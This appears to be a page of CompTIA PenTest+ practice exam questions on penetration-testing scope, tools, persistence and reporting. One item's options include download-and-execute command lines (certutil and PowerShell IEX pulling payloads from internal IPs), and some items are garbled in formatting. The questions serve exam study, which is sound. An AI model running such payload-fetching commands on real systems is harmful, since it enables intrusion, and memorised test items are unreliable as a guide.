Free CompTIA PenTest+ Exam PT0-003 Exam Practice Test

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

• Segmentation
• Mobile
• External
• Web

During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?

• ChopChop
• Replay
• Initialization vector
• KRACK

Which of the following post-exploitation activities allows a penetration tester to maintain persistent access in a compromised system?

• Creating registry keys
• Installing a bind shell
• Executing a process injection
• Setting up a reverse SSH connection

Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?

• Burp Suite
• masscan
• Nmap
• hping

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

• OS fingerprinting
• Attack path mapping
• Service discovery
• User enumeration

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

• Browser Exploitation Framework
• Maltego
• Metasploit
• theHarvester

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

• Articulation of cause
• Articulation of impact
• Articulation of escalation
• Articulation of alignment

A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings,and high-level statements. Which of the following sections of the report would most likely contain this information?

• Quality control
• Methodology
• Executive summary
• Risk scoring

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

• powershell.exe impo C:\tools\foo.ps1
• certutil.exe -f https://192.168.0.1/foo.exe bad.exe
• powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
• rundll32.exe c:\path\foo.dll,functName
• Option A
• Option B
• Option C
• Option D

A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:line 1: #!/usr/bin/bashline 2: DOMAINS_LIST = "/path/to/list.txt" line 3: while read -r i; doline 4: nikto -h $i -o scan-$i.txt & line 5: doneThe script does not work as intended. Which of the following should the tester do to fix the script?

• Change line 2 to {"domain1", "domain2", "domain3", }.
• Change line 3 to while true; read -r i; do.
• Change line 4 to nikto $i | tee scan-$i.txt.
• Change line 5 to done < "$DOMAINS_LIST".